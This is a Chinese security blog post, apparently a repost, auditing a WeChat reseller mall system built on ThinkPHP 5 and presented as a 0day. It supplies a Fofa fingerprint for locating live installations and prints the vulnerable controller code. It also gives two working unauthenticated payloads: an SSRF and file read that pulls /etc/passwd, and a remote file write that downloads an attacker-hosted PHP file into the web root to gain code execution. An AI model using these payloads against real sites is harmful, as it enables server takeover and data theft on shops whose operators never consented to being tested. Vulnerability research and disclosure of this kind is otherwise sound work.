某微商代理商补货商城系统RCE漏洞审计

admin 2024年10月3日15:28:24评论20 views字数 3181阅读10分36秒阅读模式
某微商代理商补货商城系统RCE漏洞审计

点击上方蓝字关注我们 并设为星标

0x00 前言

这个源码是一款微商分销代理商城源码,可以自己设置代理等级和升级条件(如购买指定商品、消费额度),“微商城+小程序+三级分销+拼团秒杀+多商户开店+O2O门店”通过社交关系分销裂变,把粉丝变成客户,让分销商发展下线,打造新型社交分销模式,实现人人分销、人人卖货!搭建了下,发现后台有页面打不开,但导入其他数据库文件后就可以打开。

Fofa指纹:"/template/mobile/new/static/assets/js/comm.js"

某微商代理商补货商城系统RCE漏洞审计某微商代理商补货商城系统RCE漏洞审计某微商代理商补货商城系统RCE漏洞审计框架:ThinkPHP 5

0x01 前台任意文件读取+SSRF漏洞

位于 /mobile/controller/Address.php 控制器的 curl_request 方法存在curl_exec函数,且传参均可控,导致漏洞产生,可使用file:/// gopher:// dist://等协议读取或访问任意文件.

/*** 参数1:访问的URL,参数2:post数据(不填则为GET),参数3:提交的$cookies,参数4:是否返回$cookies* @param  [type]  $url          访问的URL* @param  string  $post         post数据(不填则为GET)* @param  string  $cookie        提交的$cookies* @param  integer $returnCookie 是否返回$cookies* @return [type]                 data*/public function curl_request($url,$post='',$cookie='', $returnCookie=0){  $curl = curl_init();  curl_setopt($curl, CURLOPT_URL, $url);  curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // 跳过ssl检查项  curl_setopt($curl, CURLOPT_AUTOREFERER, 1);  curl_setopt($curl, CURLOPT_REFERER, "http://XXX");  if($post) {    curl_setopt($curl, CURLOPT_POST, 1);    curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));  }  if($cookie) {    curl_setopt($curl, CURLOPT_COOKIE, $cookie);  }  curl_setopt($curl, CURLOPT_HEADER, $returnCookie);  curl_setopt($curl, CURLOPT_TIMEOUT, 10);  curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);  $data = curl_exec($curl);  if (curl_errno($curl)) {    return curl_error($curl);  }  curl_close($curl);  if($returnCookie){    list($header, $body) = explode("rnrn", $data, 2);    preg_match_all("/Set-Cookie:([^;]*);/", $header, $matches);    $info['cookie']  = substr($matches[1][0], 1);    $info['content'] = $body;    return $info;  }else{    return $data;  }}

Payload:

/Mobile/address/curl_request?url=file:///etc/passwd

某微商代理商补货商城系统RCE漏洞审计

0x02 前台远程文件写入漏洞(RCE)

位于 /home/controller/Index.php 控制器的 Test方法先通过curl_exec函数将远程文件下载过来,然后通过fopen 直接写入到指定的文件当中,文件名可随意控制,导致漏洞产生.

// 下载图片public function dlfile($file_url, $save_to){    $ch = curl_init();    curl_setopt($ch, CURLOPT_POST, 0);    curl_setopt($ch,CURLOPT_URL,$file_url);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);    $file_content = curl_exec($ch);    curl_close($ch);    $downloaded_file = fopen($save_to, 'w');    fwrite($downloaded_file, $file_content);    fclose($downloaded_file);  }

先在云服务器或VPS上准备一个111.txt 内容为 <?php phpinfo();?> 然后使其能被访问到,之后将下方Paylaod地址替换即可

Payload:

GET /home/test/dlfile?file_url=http://127.0.0.1/111.txt&save_to=1.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveHost: 127.0.0.1Pragma: no-cacheSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"

文件会写入到1.php中

某微商代理商补货商城系统RCE漏洞审计

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE

微商系统源码关注公众号发送 241002 获取

PS:无偿帮忙代码审计,可通过公众号后台发送源码网盘链接,或加运营微信发源码即可.

PS:无偿帮忙代码审计,可通过公众号后台发送源码网盘链接,或加运营微信发源码即可.

某微商代理商补货商城系统RCE漏洞审计

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):某微商代理商补货商城系统RCE漏洞审计

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月3日15:28:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某微商代理商补货商城系统RCE漏洞审计https://cn-sec.com/archives/3228876.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息